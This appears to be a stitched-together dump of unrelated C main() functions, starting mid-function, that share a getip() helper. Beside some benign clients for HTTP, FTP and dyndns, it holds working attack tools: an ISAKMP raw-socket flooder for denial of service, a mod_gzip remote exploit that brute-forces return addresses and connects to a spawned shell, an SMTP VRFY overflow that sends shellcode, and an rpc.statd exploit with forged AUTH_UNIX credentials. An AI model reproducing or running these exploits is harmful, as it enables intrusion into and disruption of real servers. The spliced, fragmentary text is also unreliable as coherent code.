port = atoi(optarg); break;
if((port <= 0) || (port > 65535)){
printf("main(): port range error.\n");
}
case 'n':
number = atoi(optarg); break;
case 'l':
length = atoi(optarg); break;
case 'L':
loop = 1; break;
case 'h':
default:
usage(argv[0]); break;
}
}
if((!src_ok) || (!dst_ok)) usage(argv[0]);
if((nb = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))< 0){
printf("main(): socket() error.\n");
exit(0);
}
if(setsockopt(nb, IPPROTO_IP, IP_HDRINCL, (char *)&nbs, sizeof(nbs)) < 0){
printf("main(): setsockopt() error.\n");
exit(0);
}
pkt_len = length ? length : ISAKMP_LEN;
isakmp_dos(nb, source, destination, port, number, loop, pkt_len);
printf("\nRock my world, baby!\n");
return(1);
}
int main(int argc, char * argv[])
{
int n;
int s;
int c;
int sent;
char line[MAXSIZE];
char buf[BUFSIZ + 1];
struct hostent * host;
struct sockaddr_in addr;
char * ip;
if (( s = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
perror("Socket");
exit(1);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
ip = getip(argv[1]);
if (ip == 0) {
printf("Invalid host\n");
exit(1);
}
//addr.sin_addr.s_addr = inet_addr(argv[1]);
if (inet_pton(AF_INET, ip, &addr.sin_addr.s_addr) <= 0) {
perror("inet_pton");
exit(1);
}
//Connect to the server
if (connect(s, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
perror("Connect");
exit(1);
}
printf("Connected to host\n");
memset(line, 0, MAXSIZE);
sprintf(line, "GET %s HTTP/1.1\r\nConnection: close\r\n\r\n",
argv[2]);
printf("Sending request... \n===\n%s===\n", line);
//attempt to send
//Send the query to the server
sent = 0;
while(sent < strlen(line))
{
n = send(s, line+ sent, strlen(line)-sent, 0);
if(n < 0){
perror("Can't send query");
exit(1);
}
sent = sent + n;
}
n = 0;
printf("receiving...\n");
memset(buf, 0, BUFSIZ + 1);
while((n = recv(s, buf, BUFSIZ, 0)) > 0){
if (strlen(buf) == 0) {break;}
fprintf(stdout, buf);
memset(buf, 0, BUFSIZ + 1);
}
close(s);
}
int main(int argc, char **argv) {
int i=0;
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[20000];
char buf1[5000],buf2[10000];
int sock;
fd_set rset;
int port=80,shellport=2003;
int step=STEP;
char *victim=NULL;
long ret=0xbfffffff,ret_err;
int brutemode=0;
char *shellcode,*jmp;
int trg=0;
printf("\nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]\n\t\t by xCrZx [crazy_einstein] /05.06.03/\n");
for(i=0;i<argc;i++) {
if(argv[i][1]=='h') victim=argv[i+1];
if(argv[i][1]=='p') port=atoi(argv[i+1]);
if(argv[i][1]=='t') {ret=targets[atoi(argv[i+1])].ret;trg=atoi(argv[i+1]);}
if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);
if(argv[i][1]=='b') { brutemode=1; ret=strtoul(argv[i+1],0,16);}
if(argv[i][1]=='s') { step=atoi(argv[i+1]);}
}
if(!victim || ret==0) usage(argv[0]);
ret_err=targets[trg].std_err;
shellcode=targets[trg].shellcode;
jmp=targets[trg].jmp;
printf("\nUsing: ret_err = 0x%x, ret = 0x%x",ret_err,ret);
if(brutemode) printf(" ,step = %d\n",step);
printf("\n");
if(brutemode)printf("[~] Brutemode activated!\n");
do {
sock=socket(PF_INET,SOCK_STREAM,0);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(port);
if(!brutemode)printf("\n[!] Connecting to %s:%d\n",victim,port);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
if(!brutemode)printf("[+] Connected!\n",i);
memset(tmp ,0x00,sizeof tmp );
memset(buf1,0x00,sizeof buf1);
memset(buf2,0x00,sizeof buf2);
memset(buf1,0x90,2016);
memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
memset(buf1+strlen(buf1),0x90,2280);
*(long *)&buf1[strlen(buf1)]=ret_err;
for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret;
memset(buf2,0x90,1000);
memcpy(buf2+strlen(buf2),shellcode,strlen(shellcode));
sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2);
write(sock,tmp,strlen(tmp));
}else { printf("[x] Error: Could not connect to %s:%d!\n",victim,port);exit(0);}
close(sock);
ret-= step;
if(brutemode) {printf(".");fflush(stdout);}
if(!brutemode) {
printf("[*] Trying to connect to %s:%d port!!! Pray for success!\n",victim,shellport);
printf("[*] Sleeping at 2 seconds...\n");
}
sleep(2);
sock=socket(PF_INET,SOCK_STREAM,0);
bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero));
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(shellport);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
printf("\n[!] Shell is accessible!\n\n");
write(sock, "id;uname -a\n", 12);
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET(sock, &rset)) {
i = read(sock, tmp, sizeof(tmp) - 1);
if (i <= 0) {
printf("[!] Connection closed.\n");
close(sock);
exit(0);
}
tmp[i] = 0;
printf("%s", tmp);
}
if (FD_ISSET(STDIN_FILENO, &rset)) {
i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
if (i > 0) {
tmp[i]=0;
write(sock, tmp, i);
}
}
}
} else if(!brutemode)printf("[x] Shell is inaccessible..\n\n");
close(sock);
} while ( brutemode );
return 0;
}
int main() {
char *url = "www.3322.org/dyndns/getip";
getip(url);
return 0;
}
main (int argc, char *argv[])
{
int sock,targethost,sinlen;
struct sockaddr_in sin;
static unsigned char buffer[20000];
unsigned char *ptr,*ptr2;
unsigned long ret_addr;
int len,x = 1;
unsigned long rw_mem;
#ifndef UNIX
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0) exit(1);
#endif
if (argc < 4) usages(argv[0]);
targethost = getip(argv[1]);
len = strlen(argv[2]);
if (len > 60)
{
printf("Bad http format!\n");
usages(argv[0]);
}
ptr = argv[2];
while (x <= len)
{
x++;
(*ptr)++; /*Encrypt the http ip for later parsing */
ptr++;
}
if( (sscanf(argv[3],"0x%x",(unsigned long *) &ret_addr)) == 0)
{
printf("Input error, the return address has incorrect format\n");
exit(0);
}
sock = socket(AF_INET,SOCK_STREAM,0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = targethost;
sin.sin_port = htons(25);
sinlen = sizeof(sin);
printf("Starting to create the egg\n");
ptr = (char *)&buffer;
strcpy(ptr,"VRFY ");
ptr+=5;
memset((void *)ptr, 0x90, 7000);
ptr2=ptr;
ptr2+=OFFSET;
memcpy ((void *) ptr2,(void *)&ret_addr, 4);
ptr2+=8;
/* Put the code on the stack that transfers control to our code */
memcpy((void *) ptr2, (void *)&controlcode, (sizeof(controlcode)-1) );
ptr2=ptr;
ptr2+=LENGTH;
(*ptr2)=0x00;
ptr+=CODEOFFSET;
memcpy((void *) ptr,(void *)&code,strlen(code));
(char *) ptr2 = strstr(ptr,"\xb1");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2++;
(*ptr2)+= len + ( sizeof(dir) );
(char *) ptr2 = strstr(ptr,"\x83\xc6");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2+= 2;
(*ptr2)+= len + 8;
ptr+=strlen(code);
memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http
site's info */
ptr+=len;
memcpy((void *) ptr,(void*) &dir, (sizeof(dir)-1) );
printf("Made the egg\n");
if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
{
perror("error:");
exit(0);
}
printf("Connected.\n");
#ifndef UNIX
send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
send(sock,"\r\n",2,0);
#else
write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char
*)&buffer */
write(sock,"\r\n",2);
#endif
SLEEP(1);
printf("Sent the egg\n");
#ifndef UNIX
WSACleanup();
#endif
CLOSE(sock);
exit(1);
}
int main(int argc, char* argv[]){
int fd, pasv_fd;
char buf[MAX_LENGTH] = {0};
char file[MAX_FILE_SIZE] = {0};
char pasv_ip[MAX_LENGTH];
int pasv_port;
parse_args(argc, argv);
getip(sv.ip, sv.host);
//Ask for account data if it wasnt used in link.
if(strcmp(sv.user, "_undefined")==0 || strcmp(sv.pass, "_undefined")==0){
printf("[App] Username: "******"%s", sv.user);
printf("[App] Password: "******"%s", sv.pass);
printf("\n");
}
printf("RCOM FTP Application Initialized\n");
printf("-----------------------------\n");
printf("Hostname : %s\n", sv.host);
printf("IP Addr : %s\n", sv.ip);
printf("Port : %d\n", sv.port);
printf("Username : %s\n", sv.user);
printf("Password : %s\n", sv.pass);
printf("Path : %s\n", sv.path);
printf("File : %s\n", sv.file);
printf("-----------------------------\n");
// FTP Application
fd = tcp_open(sv.ip, sv.port); // Open Connection
tcp_read(fd, buf); // Read 220, Server Welcome Message
sprintf(buf, "user %s\n", sv.user); // Write Username Data and get Reply
tcp_write(fd, buf);
tcp_read(fd, buf);
sprintf(buf, "pass %s\n", sv.pass); // Write Password Data and get Reply
tcp_write(fd, buf);
tcp_read(fd, buf);
sprintf(buf, "cwd .%s\n", sv.path); // Change Directory and get Reply
tcp_write(fd, buf);
tcp_read(fd, buf);
sprintf(buf, "pasv\n"); // Enter Passive Mode and get Reply
tcp_write(fd, buf);
tcp_read(fd, buf);
pasv_port = calculate_pasv_data(buf, pasv_ip);
printf("[App] Passive Mode Data - Address: %s, Port: %d\n", pasv_ip, pasv_port);
pasv_fd = tcp_open(pasv_ip, pasv_port); // Open Secondary Stream and Download File
(void) signal(SIGALRM, retr_alarm);
retr_fd = fd;
sprintf(buf, "retr %s\n", sv.file);
strcpy(retr_buf, buf);
alarm(RETR_DELAY);
tcp_getfile(pasv_fd, file);
tcp_close(pasv_fd); // Close Connections
tcp_close(fd);
return 0;
}
int
main(int argc, char **argv)
{
int ch;
char *buff;
CLIENT *clnt;
enum clnt_stat res;
struct timeval tv, tvr;
struct sm_name smname;
struct sm_stat_res smres;
struct sockaddr_in addr;
int type = -1;
int usetcp = 0;
int timeout = 5;
int wipe = 9;
int offset = 600;
int buflen = 1024;
char *target;
char *sc = shellcode;
u_short port = 0;
u_long bufpos = 0;
int sockp = RPC_ANYSOCK;
extern char *optarg;
extern int optind;
extern int opterr;
opterr = 0;
while((ch = getopt(argc, argv, "tp:a:l:o:w:s:d:")) != -1)
{
switch(ch)
{
case 't': usetcp = 1; break;
case 'p': sscanf(optarg, "%hu", &port); break;
case 'a': sscanf(optarg, "%lx", &bufpos); break;
case 'l': buflen = atoi(optarg); break;
case 'o': offset = atoi(optarg); break;
case 's': timeout = atoi(optarg); break;
case 'w': wipe = atoi(optarg); break;
case 'd': type = atoi(optarg); break;
default : usage(argv[0]);
}
}
if(!(target = argv[optind]))
{
fprintf(stderr, "No target host specified\n");
exit(EXIT_FAILURE);
}
if(type >= 0)
{
if(type >= sizeof types / sizeof types[0] - 1)
{
fprintf(stderr, "Invalid type\n");
exit(EXIT_FAILURE);
}
sc = types[type].code;
bufpos = types[type].bufpos;
buflen = types[type].buflen;
offset = types[type].offset;
wipe = types[type].wipe;
}
if(!bufpos)
{
fprintf(stderr, "No buffer address specified\n");
exit(EXIT_FAILURE);
}
bzero(&addr, sizeof addr);
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = getip(target);
tv.tv_sec = timeout;
tv.tv_usec = 0;
if(!usetcp)
{
clnt = clntudp_create(&addr, SM_PROG, SM_VERS, tv, &sockp);
if(clnt == NULL)
{
clnt_pcreateerror("clntudp_create()");
exit(EXIT_FAILURE);
}
tvr.tv_sec = 2;
tvr.tv_usec = 0;
clnt_control(clnt, CLSET_RETRY_TIMEOUT, (char *) &tvr);
}
else
{
clnt = clnttcp_create(&addr, SM_PROG, SM_VERS, &sockp, 0, 0);
if(clnt == NULL)
{
clnt_pcreateerror("clnttcp_create()");
exit(EXIT_FAILURE);
}
}
/* AUTH_UNIX / AUTH_SYS authentication forgery */
clnt->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
buff = wizardry(sc, bufpos, buflen, offset, wipe);
smname.mon_name = buff;
res = clnt_call(clnt, SM_STAT, (xdrproc_t) xdr_sm_name,
(caddr_t) &smname, (xdrproc_t) xdr_sm_stat_res,
(caddr_t) &smres, tv);
if(res != RPC_SUCCESS)
{
clnt_perror(clnt, "clnt_call()");
printf("A timeout was expected. Attempting connection to shell..\n");
sleep(5); connection(addr);
printf("Failed\n");
}
else
{
printf("Failed - statd returned res_stat: (%s) state: %d\n",
smres.res_stat ? "failure" : "success", smres.state);
}
free(buff);
clnt_destroy(clnt);
return -1;
}
